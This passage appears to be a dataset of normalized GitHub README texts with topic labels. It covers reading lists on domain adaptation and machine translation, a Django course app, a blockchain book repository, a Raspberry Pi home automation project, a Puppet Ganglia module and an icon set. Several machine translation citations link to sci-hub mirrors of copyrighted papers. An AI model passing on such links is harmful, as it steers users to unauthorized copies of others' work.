2019 https www aclweb org anthology p19 1236 multi task domain adaptation for sequence tagging peng dredze repl4nlp 2017 https www aclweb org anthology w17 2612 effective unsupervised domain adaptation with adversarially trained language models vu et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 497 inexpensive domain adaptation of pretrained language models case studies on biomedical ner and covid 19 qa poerner et al findings of emnlp 2020 https www aclweb org anthology 2020 findings emnlp 134 event extraction adapting event extractors to medical data bridging the covariate shift naik et al eacl 2021 https aclanthology org 2021 eacl main 258 pdf relation extraction adversarial training for relation extraction wu et al emnlp 2017 https www aclweb org anthology d17 1187 domain adaptation for relation extraction with domain adversarial neural network fu et al ijcnlp 2017 https www aclweb org anthology i17 2072 generalizing biomedical relation classification with neural adversarial domain adaptation rios et al bioinf 2018 https academic oup com bioinformatics article 34 17 2973 4953706 genre separation network with adversarial training for cross genre relation extraction shi et al emnlp 2018 https www aclweb org anthology d18 1125 don t stop pretraining adapt language models to domains and tasks gururangan et al acl 2020 https www aclweb org anthology 2020 acl main 740
ai
ibm-django-app-onlinecourse
general notes an onlinecourse app has already been provided in this repo upon which you will be adding a new assesement feature if you want to develop the final project on theia hosted by ibm developer skills network https labs cognitiveclass ai you will need to create the same project structure on theia workspace and save it everytime you close the browser or you could develop the final project locally by setting up your own python runtime and ide hints for the final project are left on source code files you may choose any cloud platform for deployment default is ibm cloud foundry depends on your deployment you may choose any sql database django supported such as sqlite3 postgresql and mysql default is sqlite3 er diagram for your reference we have prepared the er diagram design for the new assesement feature onlinecourse er diagram https github com ibm developer skills network final cloud app with database blob master static media course images onlinecourse app er png
server
Learn-Blockchain-Programming-with-JavaScript
learn blockchain programming with javascript a href https www packtpub com web development learn blockchain programming javascript utm source github utm medium repository utm campaign 9781789618822 img src https www packtpub com sites default files b12086 png alt learn blockchain programming with javascript height 256px align right a this is the code repository for learn blockchain programming with javascript https www packtpub com web development learn blockchain programming javascript utm source github utm medium repository utm campaign 9781789618822 published by packt build your very own blockchain and decentralized network with javascript and node js what is this book about learn blockchain programming with javascript begins by giving you a clear understanding of what blockchain technology is you ll then set up an environment to build your very own blockchain and you ll add various functionalities to it by adding functionalities to your blockchain such as the ability to mine new blocks create transactions and secure your blockchain through a proof of work you ll gain an in depth understanding of how blockchain technology functions this book covers the following exciting features gain an in depth understanding of blockchain and the environment setup create your very own decentralized blockchain network from scratch build and test the various endpoints necessary to create a decentralized network learn about proof of work and the hashing algorithm used to secure data mine new blocks create new transactions and store the transactions in blocks if you feel this book is for you get your copy https www amazon com dp 1789618827 today a href https www packtpub com utm source github utm medium banner utm campaign githubbanner img src https raw githubusercontent com packtpublishing github master github png alt https www packtpub com border 5 a instructions and navigations all of the code is organized into folders for example chapter02 the code will look like the following blockchain prototype createnewblock function following is what you need for this book learn blockchain programming with javascript is for javascript developers who wish to learn about blockchain programming or build their own blockchain using javascript frameworks with the following software and hardware list you can run all code files present in the book chapter 1 8 software and hardware list chapter software required os required 1 8 any text editor and node js windows mac os x related products other books you may enjoy learn bitcoin and blockchain packt https www packtpub com big data and business intelligence learn bitcoin and blockchain utm source github utm medium repository utm campaign 9781789536133 amazon https www amazon com dp 1789536138 building enterprise javascript applications packt https www packtpub com web development building enterprise javascript applications utm source github utm medium repository utm campaign 9781788477321 amazon https www amazon com dp 1788477324 get to know the author eric traub currently works as a software engineer in new york city he has extensive experience working as a teacher and instructing people in a variety of different subjects he changed his career from teaching to software engineering because of the excitement it brings to him and the passion that he has for it he is now lucky enough to have the opportunity to combine both of these passions software engineering and teaching suggestions and feedback click here https docs google com forms d e 1faipqlsdy7datc6qmel81fiuuymz0wy9vh1jhkvpy57oimekgqib ow viewform if you have any feedback or suggestions download a free pdf i if you have already purchased a print or kindle version of this book you can get a drm free pdf version at no cost br simply click on the link to claim your free pdf i p align center a href https packt link free ebook 9781789618822 https packt link free ebook 9781789618822 a p
blockchain
IoT
iot internet of things based home automation project using ibm iotf platform please follow the tutorial at http diyhacking com raspberry pi home automation ibm bluemix this repository consists of two scripts client py this python script runs on the raspberry pi it accepts command from the server and pushes data from a pir motion sensor to the ibm iotf platform server py this python script runs on the web server or laptop and issues commands that control the gpio pins on the raspberry pi before running this script on the server you should install the corresponding packages for ibm iotf the instructions can be found here https docs internetofthings ibmcloud com libraries python html
server
puppet-ganglia
puppet ganglia module ci https github com jhoblitt puppet ganglia actions workflows ci yml badge svg https github com jhoblitt puppet ganglia actions workflows ci yml markdownlint https github com jhoblitt puppet ganglia actions workflows markdownlint yaml badge svg https github com jhoblitt puppet ganglia actions workflows markdownlint yaml shellcheck https github com jhoblitt puppet ganglia actions workflows shellcheck yaml badge svg https github com jhoblitt puppet ganglia actions workflows shellcheck yaml yamllint https github com jhoblitt puppet ganglia actions workflows yamllint yaml badge svg https github com jhoblitt puppet ganglia actions workflows yamllint yaml table of contents 1 overview overview 2 description description 3 usage usage examples examples classes classes ganglia gmond gangliagmond ganglia gmetda gangliagmetad ganglia web gangliaweb 4 limitations limitations puppet version compatibility puppet version compatibility osfamily redhat and epel packages osfamily redhat and epel packages 5 versioning versioning 6 support support 7 contributing contributing 8 see also see also overview manages ganglia gmond gmetad daemons web front end description this is a puppet module for installation and configuration of the ganglia http ganglia sourceforge net gmond gmetad daemons web front end usage examples puppet unicast udp recv channel port 8649 bind localhost port 8649 bind 0 0 0 0 udp send channel port 8649 host test1 example org ttl 2 port 8649 host test2 example org ttl 2 bind hostname yes host test3 example org ttl 1 tcp accept channel port 8649 multicast udp recv channel mcast join 239 2 11 71 mcast if eth0 port 8649 ttl 1 udp send channel mcast join 239 2 11 71 port 8649 bind 239 2 11 71 tcp accept channel port 8649 gmond package name ganglia gmond ganglia gmond python class ganglia gmond globals deaf yes globals host dmax 691200 globals send metadata interval 60 globals override hostname web example org cluster name example grid cluster owner acme inc cluster latlong n32 2332147 w110 9481163 cluster url www example org host location example computer room udp recv channel udp recv channel udp send channel udp send channel tcp accept channel tcp accept channel gmond package name gmond package name puppet clusters name test address test1 example org test2 example org rras cf average xff 0 5 steps 1 rows 5856 cf average xff 0 5 steps 4 rows 20160 cf average xff 0 5 steps 40 rows 52704 class ganglia gmetad clusters clusters gridname my grid rras rras all trusted false trusted hosts puppet class ganglia web ganglia ip 192 168 0 1 ganglia port 8652 classes ganglia gmond this class manages the configurtion of the ganglia gmond daemon puppet defaults class ganglia gmond globals deaf no globals host dmax 0 globals send metadata interval 300 globals override hostname undef cluster name unspecified cluster owner unspecified cluster latlong unspecified cluster url unspecified host location unspecified udp send channel mcast join 239 2 11 71 port 8649 ttl 1 udp recv channel mcast join 239 2 11 71 port 8649 bind 239 2 11 71 tcp accept channel port 8659 gmond package name ganglia params gmond package name globals deaf string defaults to no globals host dmax string defaults to 0 globals send metadata interval string defaults to 300 globals override hostname string defaults to undef cluster name string defaults to unspecified cluster owner string defaults to unspecified cluster latlong string defaults to unspecified cluster url string defaults to unspecified host location string defaults to unspecified udp send channel array of hash defaults to puppet mcast join 239 2 11 71 port 8649 ttl 1 supported hash keys are all optional bind hostname mcast join mcast if host port ttl udp recv channel array of hash defaults to puppet mcast join 239 2 11 71 port 8649 bind 239 2 11 71 supported hash keys are all optional mcast join mcast if port bind family tcp accept channel array of hash defaults to puppet port 8659 supported hash keys are all optional port family gmond package name string or array defaults to ganglia params gmond package name ganglia gmetad install and configure the ganglia gmetad daemon puppet defaults class ganglia gmetad all trusted false clusters name my cluster address localhost gridname undef rras ganglia params rras trusted hosts gmetad package name ganglia params gmetad package name gmetad service name ganglia params gmetad service name gmetad service config ganglia params gmetad service config gmetad user ganglia params gmetad user gmetad case sensitive hostnames ganglia params gmetad case sensitive hostnames all trusted boolean defaults to false if set to true will allow any host to query ganglia data via the xml query port corresponds to the all trusted field in gmetad conf clusters array of hash defaults to puppet name my cluster address localhost supported hash keys are name required polling interval optional address may be a string or array of string gridname string defaults to undef rras array of hash defaults to puppet cf average xff 0 5 steps 1 rows 5856 cf average xff 0 5 steps 4 rows 20160 cf average xff 0 5 steps 40 rows 52704 supported hash keys all keys are required are cf consolidation function cf can be average min max last xff xfiles factor xff defines what part of a consolidation interval may be made up from unknown data while the consolidated value is still regarded as known it is given as the ratio of allowed unknown pdps to the number of pdps in the interval thus it ranges from 0 to 1 exclusive steps steps defines how many of these primary data points are used to build a consolidated data point which then goes into the archive rows rows defines how many generations of data values are kept in an rra obviously this has to be greater than zero trusted hosts array of strings defaults to each string matches a hostname that is allowed to query ganglia data via the xml query port corresponds to the all trusted field in gmetad conf gmetad package name string defaults to ganglia params gmetad package name gmetad service name string defaults to ganglia params gmetad service name gmetad service config string defaults to ganglia params gmetad service config gmetad user string defaults to ganglia params gmetad user gmetad case sensitive hostnames integer defaults to ganglia params gmetad case sensitive hostnames accepted values are 0 or 1 ganglia web install and configure the ganglia web front end puppet defaults class ganglia web ganglia ip 127 0 0 1 ganglia port 8652 ganglia ip string defaults to 127 0 0 1 ganglia port string or integer defaults to integer 8652 passing a string to ganglia port is deprecated please use an integer value limitations puppet version compatibility versions puppet 2 7 puppet 3 x puppet 4 x puppet 5 x puppet 6 x 1 x yes yes no no no 2 x no yes yes no no 3 x no no no yes yes osfamily redhat and epel packages as of 2012 11 16 the stable epel repos for el5 and el6 contain respectively packages for ganglia 3 0 7 and 3 1 7 the ganglia udp protocol for communication between gmond daemons changed incompatibly between 3 0 x and 3 1 x however the tcp based protocol gmetad uses to poll gmond agents has remained compatible if it s desirable to stick with the epel packages a possible way of dealing with this is divide a group of hosts into two clusters based on lsbmajdistrelease which should imply gmond version without having to install a custom fact the example below divides the previous mycluster into mycluster el5 and mycluster el6 note that you will also have to configure gmetad to pull a gmond agent from each of these new clusters puppet udp recv channel port 8649 bind localhost port 8649 bind 0 0 0 0 case lsbmajdistrelease 5 epel for el5 x has 3 0 x which will not work with gmond in 3 1 x udp send channel port 8649 host gmond 3 0 host1 example org ttl 2 port 8649 host gmond 3 0 host2 example org ttl 2 cluster name mycluster el5 6 default epel for el6 x has 3 1 x udp send channel port 8649 host gmond 3 1 host1 example org ttl 2 port 8649 host gmond 3 1 host2 example org ttl 2 cluster name mycluster el6 tcp accept channel port 8649 class ganglia gmond cluster name example grid cluster owner acme inc cluster latlong n32 2332147 w110 9481163 cluster url www example org host location example computer room udp recv channel udp recv channel udp send channel udp send channel tcp accept channel tcp accept channel versioning this module is versioned according to the semantic versioning 2 0 0 http semver org spec v2 0 0 html specification support please log tickets and issues at github https github com jhoblitt puppet ganglia issues contributing 1 fork it on github 2 make a local clone of your fork 3 create a topic branch eg feature mousetrap 4 make commit changes commit messages should be in imperative tense http git scm com book ch5 2 html check that linter warnings or errors are not introduced pdk validate a check that rspec unit tests are not broken and coverage is added for new features pdk test unit documentation of api features is updated as appropriate in the readme if present beaker acceptance tests should be run and potentially updated pdk bundle exec rake beaker 5 when the feature is complete rebase squash the branch history as necessary to remove fix typo oops whitespace and other trivial commits 6 push the topic branch to github 7 open a pull request pr from the topic branch onto parent repo s master branch see also ganglia http ganglia sourceforge net
front_end
system-uicons
what is system uicons system uicons is a collection of open source icons designed for products and systems in mind each icon is on a 21x21 grid use the icons how you want for free and without any attribution https systemuicons com https systemuicons com looking for a react library of system uicons martin zl mal https github com mrtnzlml has created an awesome open source community icon group over at system uicons react https github com adeira icons
iconset icons
os
MT-Reading-List
machine translation reading list this is a machine translation reading list maintained by the tsinghua natural language processing group the past three decades have witnessed the rapid development of machine translation especially for data driven approaches such as statistical machine translation smt and neural machine translation nmt due to the dominance of nmt at the present time priority is given to collecting important up to date nmt papers the edinburgh jhu mt research survey wiki http www statmt org survey has good coverage of older papers and a brief description for each sub topic of mt our list is still incomplete and the categorization might be inappropriate we will keep adding papers and improving the list any suggestions are welcome 10 must reads 10 must reads tutorials and surveys surveys statistical machine translation statistical machine translation word based models word based models phrase based models phrase based models syntax based models syntax based models discriminative training discriminative training system combination system combination human centered smt human centered smt interactive smt interactive adaptation adaptation smt evaluation evaluation neural machine translation neural machine translation model architecture model architecture attention mechanism attention mechanism open vocabulary open vocabulary training objectives and frameworks training decoding decoding low resource language translation low resource language translation semi supervised learning semi supervised unsupervised learning unsupervised pivot based methods pivot based data augmentation data augmentation data selection data selection transfer learning transfer learning meta learning meta learning multilingual machine translation multilingual prior knowledge integration prior knowledge integration word phrase constraints word phrase constraints syntactic semantic constraints syntactic semantic constraints coverage constraints coverage constraints document level translation document level translation robustness robustness interpretability interpretability linguistic interpretation linguistic interpretation fairness and diversity fairness and diversity efficiency efficiency non autoregressive translation nat speech translation and simultaneous translation speech translation and simultaneous translation multi modality multi modality ensemble and reranking ensemble reranking pre training pre training domain adaptation domain adaptation quality estimation quality estimation human centered nmt human centered interactive nmt interactive nmt automatic post editing ape poetry translation poetry translation eco friendly eco friendly compositional generalization compositional generalization endangered language revitalization endangered word translation bilingual lexicon induction word translation wmt winners wmt winners wmt 2019 wmt19 wmt 2018 wmt18 wmt 2017 wmt17 wmt 2016 wmt16 h2 id 10 must reads 10 must reads h2 peter e brown stephen a della pietra vincent j della pietra and robert l mercer 1993 the mathematics of statistical machine translation parameter estimation http aclweb org anthology j93 2003 computational linguistics citation https scholar google com scholar cites 2259057253133260714 as sdt 2005 sciodt 0 5 hl en 5 218 kishore papineni salim roukos todd ward and wei jing zhu 2002 bleu a method for automatic evaluation of machine translation http aclweb org anthology p02 1040 in proceedings of acl 2002 citation https scholar google com scholar cites 9019091454858686906 as sdt 2005 sciodt 0 5 hl en 10 700 philipp koehn franz j och and daniel marcu 2003 statistical phrase based translation http aclweb org anthology n03 1017 in proceedings of naacl 2003 citation https scholar google com scholar cites 11796378766060939113 as sdt 2005 sciodt 0 5 hl en 3 713 franz josef och 2003 minimum error rate training in statistical machine translation http aclweb org anthology p03 1021 in proceedings of acl 2003 citation https scholar google com scholar cites 15358949031331886708 as sdt 2005 sciodt 0 5 hl en 3 115 david chiang 2007 hierarchical phrase based translation http aclweb org anthology j07 2003 computational linguistics citation https scholar google com hk scholar cites 17074501474509484516 as sdt 2005 sciodt 0 5 hl en 1 235 ilya sutskever oriol vinyals and quoc v le 2014 sequence to sequence learning with neural networks https papers nips cc paper 5346 sequence to sequence learning with neural networks pdf in proceedings of nips 2014 citation https scholar google com scholar cites 13133880703797056141 as sdt 2005 sciodt 0 5 hl en 9 432 dzmitry bahdanau kyunghyun cho and yoshua bengio 2015 neural machine translation by jointly learning to align and translate https arxiv org pdf 1409 0473 pdf in proceedings of iclr 2015 citation https scholar google com scholar cites 9430221802571417838 as sdt 2005 sciodt 0 5 hl en 10 479 diederik p kingma jimmy ba 2015 adam a method for stochastic optimization https arxiv org pdf 1412 6980 in proceedings of iclr 2015 citation https scholar google com scholar cites 16194105527543080940 as sdt 2005 sciodt 0 5 hl en 37 480 rico sennrich barry haddow and alexandra birch 2016 neural machine translation of rare words with subword units https arxiv org pdf 1508 07909 pdf in proceedings of acl 2016 citation https scholar google com scholar cites 1307964014330144942 as sdt 2005 sciodt 0 5 hl en 1 679 ashish vaswani noam shazeer niki parmar jakob uszkoreit llion jones aidan n gomez lukasz kaiser and illia polosukhin 2017 attention is all you need https papers nips cc paper 7181 attention is all you need pdf in proceedings of nips 2017 citation https scholar google com scholar cites 2960712678066186980 as sdt 2005 sciodt 0 5 hl en 6 112 h2 id surveys tutorials and surveys h2 zhixing tan shuo wang zonghan yang gang chen xuancheng huang maosong sun and yang liu 2020 neural machine translation a review of methods resources and tools https arxiv org abs 2012 15515 ai open felix stahlberg 2020 neural machine translation a review and survey https arxiv org abs 1912 02047 journal of artificial intelligence research philipp koehn and rebecca knowles 2017 six challenges for neural machine translation http www aclweb org anthology w17 3204 in proceedings of the first workshop on neural machine translation philipp koehn 2017 neural machine translation https arxiv org abs 1709 07809 arxiv 1709 07809 oriol vinyals and navdeep jaitly 2017 seq2seq icml tutorial https docs google com presentation d 1quimxeepef5ekrhc2usqaojrc4qnx6 komdztbmbwjk present slide id p icml 2017 tutorial raj dabre chenhui chu and anoop kunchukuttan 2020 a survey of multilingual neural machine translation https doi org 10 1145 3406095 acm computing surveys surv 53 5 article 99 october 2020 tutorial on multilingual neural machine translation https github com anoopkunchukuttan multinmt tutorial coling2020 at coling 2020 graham neubig 2017 neural machine translation and sequence to sequence models a tutorial https arxiv org pdf 1703 01619 pdf arxiv 1703 01619 citation https scholar google com scholar cites 17621873290135947085 as sdt 2005 sciodt 0 5 hl en 45 thang luong kyunghyun cho and christopher manning 2016 neural machine translation https nlp stanford edu projects nmt luong cho manning nmt acl2016 v4 pdf acl 2016 tutorial adam lopez 2008 statistical machine translation http delivery acm org 10 1145 1390000 1380586 a8 lopez pdf ip 101 5 129 50 id 1380586 acc active 20service key bf85bba5741fdc6e 2e587f3204f5b62a59 2e4d4702b0c3e38b35 2e4d4702b0c3e38b35 acm 1546058891 981e84a24804f2dbc0549b9892a2ea1d acm computing surveys philipp koehn 2006 statistical machine translation the basic the novel and the speculative http homepages inf ed ac uk pkoehn publications tutorial2006 pdf eacl 2006 tutorial h2 id statistical machine translation statistical machine translation h2 h3 id word based models word based models h3 peter e brown stephen a della pietra vincent j della pietra and robert l mercer 1993 the mathematics of statistical machine translation parameter estimation http aclweb org anthology j93 2003 computational linguistics citation https scholar google com scholar cites 2259057253133260714 as sdt 2005 sciodt 0 5 hl en 4 965 stephan vogel hermann ney and christoph tillmann 1996 hmm based word alignment in statistical translation http aclweb org anthology c96 2141 in proceedings of coling 1996 citation https scholar google com hk scholar cites 6742027174667056165 as sdt 2005 sciodt 0 5 hl en 940 franz josef och and hermann ney 2003 a systematic comparison of various statistical alignment models http aclweb org anthology j03 1002 computational linguistics citation https scholar google com hk scholar cites 7906670690027479083 as sdt 2005 sciodt 0 5 hl en 3 980 percy liang ben taskar and dan klein 2006 alignment by agreement https cs stanford edu pliang papers alignment naacl2006 pdf in proceedings of naacl 2006 citation https scholar google com hk scholar cites 10766838746666771394 as sdt 2005 sciodt 0 5 hl en 452 chris dyer victor chahuneau and noah a smith 2013 a simple fast and effective reparameterization of ibm model 2 http www aclweb org anthology n13 1073 in proceedings of naacl 2013 citation https scholar google com hk scholar cites 13560076980956479370 as sdt 2005 sciodt 0 5 hl en 310 h3 id phrase based models phrase based models h3 philipp koehn franz j och and daniel marcu 2003 statistical phrase based translation http aclweb org anthology n03 1017 in proceedings of naacl 2003 citation https scholar google com hk scholar cites 11796378766060939113 as sdt 2005 sciodt 0 5 hl en 3 516 michel galley and christopher d manning 2008 a simple and effective hierarchical phrase reordering model https nlp stanford edu pubs emnlp08 lexorder pdf in proceedings of emnlp 2008 citation https scholar google com hk scholar cites 14572547803642015856 as sdt 2005 sciodt 0 5 hl en 275 h3 id syntax based models syntax based models h3 dekai wu 1997 stochastic inversion transduction grammars and bilingual parsing of parallel corpora http aclweb org anthology j97 3002 computational linguistics citation https scholar google com hk scholar cites 7926725626202301933 as sdt 2005 sciodt 0 5 hl en 1 009 michel galley jonathan graehl kevin knight daniel marcu steve deneefe wei wang and ignacio thayer 2006 scalable inference and training of context rich syntactic translation models http aclweb org anthology p06 1121 in proceedings of coling acl 2006 citation https scholar google com hk scholar cites 2650671041278094269 as sdt 2005 sciodt 0 5 hl en 475 yang liu qun liu and shouxun lin 2006 tree to string alignment template for statistical machine translation http aclweb org anthology p06 1077 in proceedings of coling acl 2006 citation https scholar google com hk scholar cites 8683308453323663525 as sdt 2005 sciodt 0 5 hl en 391 deyi xiong qun liu and shouxun lin 2006 maximum entropy based phrase reordering model for statistical machine translation https aclanthology info pdf p p06 p06 1066 pdf in proceedings of coling acl 2006 citation https scholar google com hk scholar cites 11896300896063367737 as sdt 2005 sciodt 0 5 hl en 299 david chiang 2007 hierarchical phrase based translation http aclweb org anthology j07 2003 computational linguistics citation https scholar google com hk scholar cites 17074501474509484516 as sdt 2005 sciodt 0 5 hl en 1 192 liang huang and david chiang 2007 forest rescoring faster decoding with integrated language models http citeseerx ist psu edu viewdoc download doi 10 1 1 88 5058 rep rep1 type pdf in proceedings of acl 2007 citation https scholar google com hk scholar cites 2826188279623417237 as sdt 2005 sciodt 0 5 hl en 280 haitao mi liang huang and qun liu 2008 forest based translation http aclweb org anthology p08 1023 in proceedings of acl 2008 citation https scholar google com hk scholar cites 11263493281241243162 as sdt 2005 sciodt 0 5 hl en 239 min zhang hongfei jiang aiti aw haizhou li chew lim tan and sheng li 2008 a tree sequence alignment based tree to tree translation model http www aclweb org anthology p08 1064 in proceedings of acl 2008 citation https scholar google com hk scholar cites 4828105603038412208 as sdt 2005 sciodt 0 5 hl en 124 libin shen jinxi xu and ralph weischedel 2008 a new string to dependency machine translation algorithm with a target dependency language model http aclweb org anthology p08 1066 in proceedings of acl 2008 citation https scholar google com hk scholar cites 15082517325172081801 as sdt 2005 sciodt 0 5 hl en 278 haitao mi and liang huang 2008 forest based translation rule extraction http aclweb org anthology d08 1022 in proceedings of emnlp 2008 citation https scholar google com hk scholar cites 11263493281241243162 as sdt 2005 sciodt 0 5 hl en 239 yang liu yajuan l and qun liu 2009 improving tree to tree translation with packed forests http aclweb org anthology p09 1063 in proceedings of acl ijnlp 2009 citation https scholar google com hk scholar cites 3907324274083528908 as sdt 2005 sciodt 0 5 hl en 93 david chiang 2010 learning to translate with source and target syntax http aclweb org anthology p10 1146 in proceedings of acl 2010 citation https scholar google com hk scholar cites 18270412258769590027 as sdt 2005 sciodt 0 5 hl en 118 h3 id discriminative training discriminative training h3 franz josef och and hermann ney 2002 discriminative training and maximum entropy models for statistical machine translation http aclweb org anthology p02 1038 in proceedings of acl 2002 citation https scholar google com hk scholar cites 2845378992177918439 as sdt 2005 sciodt 0 5 hl en 1 258 franz josef och 2003 minimum error rate training in statistical machine translation http aclweb org anthology p03 1021 in proceedings of acl 2003 citation https scholar google com hk scholar cites 15358949031331886708 as sdt 2005 sciodt 0 5 hl en 2 984 taro watanabe jun suzuki hajime tsukada and hideki isozaki 2007 online large margin training for statistical machine translation http aclweb org anthology d07 1080 in proceedings of emnlp conll 2007 citation https scholar google com hk scholar cites 6690339336101573833 as sdt 2005 sciodt 0 5 hl en 197 david chiang kevin knight and wei wang 2009 11 001 new features for statistical machine translation http aclweb org anthology n09 1025 in proceedings of naacl 2009 citation https scholar google com hk scholar cites 14062409519286340147 as sdt 2005 sciodt 0 5 hl en 251 h3 id system combination system combination h3 antti veikko rosti spyros matsoukas and richard schwartz 2007 improved word level system combination for machine translation http aclweb org anthology p07 1040 in proceedings of acl 2007 citation https scholar google com hk scholar cites 13310846375895519088 as sdt 2005 sciodt 0 5 hl en 144 xiaodong he mei yang jianfeng gao patrick nguyen and robert moore 2008 indirect hmm based hypothesis alignment for combining outputs from machine translation systems http aclweb org anthology d08 1011 in proceedings of emnlp 2008 citation https scholar google com hk scholar cites 5843300493006970528 as sdt 2005 sciodt 0 5 hl en 96 h3 id human centered smt human centered smt h3 h4 id interactive interactive smt h4 george foster pierre isabelle and pierre plamondon 1997 target text mediated interactive machine translation https sci hub tw 10 2307 40009035 machine translation citation https scholar google com scholar cites 17084037882064721827 as sdt 2005 sciodt 0 5 116 philippe langlais guy lapalme and marie lorange 2002 transtype development evaluation cycles to boost translator s productivity https sci hub tw 10 2307 40007093 machine translation citation https scholar google com scholar cites 7892155138946158318 as sdt 2005 sciodt 0 5 74 jes s tomas and francisco casacuberta 2006 statistical phrase based models for interactive computer assisted translation http aclweb org anthology p06 2107 in proceedings of coling acl citation https scholar google com scholar cites 2242179645100420046 as sdt 2005 sciodt 0 5 31 enrique vidal francisco casacuberta luis rodr guez ruiz jorge civera carlos d mart nez hinarejos 2006 computer assisted translation using speech recognition https ieeexplore ieee org document 1621206 ieee transaction on audio speech and language processing citation https scholar google com scholar cites 32625184311110830 as sdt 2005 sciodt 0 5 62 shahram khadivi and hermann ney 2008 integration of speech recognition and machine translation in computer assisted translation https sci hub tw 10 1109 tasl 2008 2004301 ieee transaction on audio speech and language processing citation https scholar google com scholar cites 1690852455408892756 as sdt 2005 sciodt 0 5 30 sergio barrachina oliver bender francisco casacuberta jorge civera elsa cubel shahram khadivi antonio l lagarda hermann ney jes s tom s and enrique vidal 2009 statistical approaches to computer assisted translation https www mitpressjournals org doi abs 10 1162 coli 2008 07 055 r2 06 29 computational linguistics citation https scholar google com scholar cites 17691637682117292572 as sdt 2005 sciodt 0 5 207 francisco casacuberta jorge civera elsa cubel antonio l lagarda guy lapalme elliott macklovitch enrique vidal 2009 human interaction for high quality machine translation https sci hub tw 10 1145 1562764 1562798 communications of the acm citation https scholar google com scholar cites 6184654159576071790 as sdt 2005 sciodt 0 5 49 vicent alabau alberto sanchis and francisco casacuberta 2014 improving on line handwritten recognition in interactive machine translation sci hub tw 10 1016 j patcog 2013 09 035 pattern recognition citation https scholar google com scholar cites 11987123133913382404 as sdt 2005 sciodt 0 5 18 shanbo cheng shujian huang huadong chen xin yu dai and jiajun chen 2016 primt a pick revise framework for interactive machine translation http www aclweb org anthology n16 1148 in proceedings of naacl 2016 citation https scholar google com scholar cites 3643727460542665178 as sdt 2005 sciodt 0 5 9 miguel domingo lvaro peris and francisco casacuberta 2018 segment based interactive predictive machine translation https www researchgate net publication 322275484 segment based interactive predictive machine translation machine translation citation https scholar google com scholar cites 4148585683672959462 as sdt 2005 sciodt 0 5 2 h4 id adaptation smt adaptation h4 pascual mart nez g mez germ n sanchis trilles and francisco casacuberta 2012 online adaptation strategies for statistical machine translation in post editing scenarios https sci hub tw 10 1016 j patcog 2012 01 011 pattern recognition citation https scholar google com scholar cites 9143628035426486873 as sdt 2005 sciodt 0 5 40 jes s gonz lez rubio and francisco casacuberta 2014 cost sensitive active learning for computer assisted translation https sci hub tw 10 1016 j patrec 2013 06 007 pattern recognition letters citation https scholar google com scholar cites 13196627956841822823 as sdt 2005 sciodt 0 5 11 antonio l lagarda daniel ortiz mart nez vicent alabau and francisco casacuberta 2015 translating without in domain corpus machine translation post editing with online learning techniques https sci hub tw 10 1016 j csl 2014 10 004 computer speech language citation https scholar google com scholar cites 6721510771212778605 as sdt 2005 sciodt 0 5 10 germ n sanchis trilles francisco casacuberta 2015 improving translation quality stability using bayesian predictive adaptation https sci hub tw 10 1016 j csl 2015 03 001 computer speech language citation https scholar google com scholar q improving translation quality stability using bayesian predictive adaptation 1 daniel ortiz mart nez 2016 online learning for statistical machine translation https www mitpressjournals org doi full 10 1162 coli a 00244 computational linguistics citation https scholar google com scholar cites 4979468821667106694 as sdt 2005 sciodt 0 5 13 h2 id evaluation evaluation h2 kishore papineni salim roukos todd ward and wei jing zhu 2002 bleu a method for automatic evaluation of machine translation http aclweb org anthology p02 1040 in proceedings of acl 2002 citation https scholar google com hk scholar cites 9019091454858686906 as sdt 2005 sciodt 0 5 hl en 8 499 philipp koehn 2004 statistical significance tests for machine translation evaluation http www aclweb org anthology w04 3250 in proceedings of emnlp 2004 citation https scholar google com hk scholar cites 6141850486206753388 as sdt 2005 sciodt 0 5 hl en 1 015 satanjeev banerjee and alon lavie 2005 meteor an automatic metric for mt evaluation with improved correlation with human judgments http aclweb org anthology w05 0909 in proceedings of the acl workshop on intrinsic and extrinsic evaluation measures for machine translation and or summarization citation https scholar google com hk scholar cites 11797833340491598355 as sdt 2005 sciodt 0 5 hl en 1 355 matthew snover and bonnie dorr richard schwartz linnea micciulla and john makhoul 2006 a study of translation edit rate with targeted human annotation http mt archive info amta 2006 snover pdf in proceedings of amta 2006 citation https scholar google com hk scholar cites 1809540661740640949 as sdt 2005 sciodt 0 5 hl en 1 713 maja popovic 2015 chrf character n gram f score for automatic mt evaluation http aclweb org anthology w15 3049 in proceedings of wmt 2015 citation https scholar google com scholar um 1 ie utf 8 lr cites 12169100229181212462 58 xin wang wenhu chen yuan fang wang and william yang wang 2018 no metrics are perfect adversarial reward learning for visual storytelling http aclweb org anthology p18 1083 in proceedings of acl 2018 citation https scholar google com hk scholar cites 1809540661740640949 as sdt 2005 sciodt 0 5 hl en 10 arun tejasvi chaganty stephen mussman and percy liang 2018 the price of debiasing automatic metrics in natural language evaluation https arxiv org pdf 1807 02202 in proceedings of acl 2018 graham neubig zi yi dou junjie hu paul michel danish pruthi and xinyi wang 2019 compare mt a tool for holistic comparison of language generation systems https arxiv org pdf 1903 07926 pdf in proceedings of naacl 2019 robert schwarzenberg david harbecke vivien macketanz eleftherios avramidis and sebastian m ller 2019 train sort explain learning to diagnose translation models https arxiv org pdf 1903 12017 pdf in proceedings of naacl 2019 nitika mathur timothy baldwin and trevor cohn 2019 putting evaluation in context contextual embeddings improve machine translation evaluation https www aclweb org anthology p19 1269 in proceedings of acl 2019 prathyusha jwalapuram shafiq joty irina temnikova and preslav nakov 2019 evaluating pronominal anaphora in machine translation an evaluation measure and a test suite https arxiv org pdf 1909 00131 in proceedings of acl 2019 sergey edunov myle ott marc aurelio ranzato and michael auli 2020 on the evaluation of machine translation systems trained with back translation https arxiv org abs 1908 05204 in proceedings of acl 2020 wei zhao goran glava maxime peyrard yang gao robert west and steffen eger 2020 on the limitations of cross lingual encoders as exposed by reference free machine translation evaluation http arxiv org abs 2005 01196 in proceedings of acl 2020 marina fomicheva lucia specia and francisco guzm n 2020 multi hypothesis machine translation evaluation https www aclweb org anthology 2020 acl main 113 in proceedings of acl 2020 kosuke takahashi katsuhito sudoh and satoshi nakamura 2020 automatic machine translation evaluation using source language inputs and cross lingual language model https www aclweb org anthology 2020 acl main 327 in proceedings of acl 2020 nitika mathur timothy baldwin and trevor cohn 2020 tangled up in bleu reevaluating the evaluation of automatic machine translation evaluation metrics https www aclweb org anthology 2020 acl main 448 in proceedings of acl 2020 markus freitag david grangier isaac caswell 2020 bleu might be guilty but references are not innocent https www aclweb org anthology 2020 emnlp main 5 in proceedings of emnlp 2020 yvette graham barry haddow philipp koehn 2020 statistical power and translationese in machine translation evaluation https www aclweb org anthology 